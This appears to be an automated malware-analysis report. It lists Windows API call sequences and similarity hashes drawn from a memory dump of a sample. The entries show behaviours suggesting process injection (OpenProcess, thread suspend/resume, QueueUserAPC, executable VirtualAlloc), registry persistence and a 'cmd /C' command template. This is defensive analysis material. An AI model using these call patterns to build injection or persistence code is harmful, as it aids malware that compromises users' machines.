Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
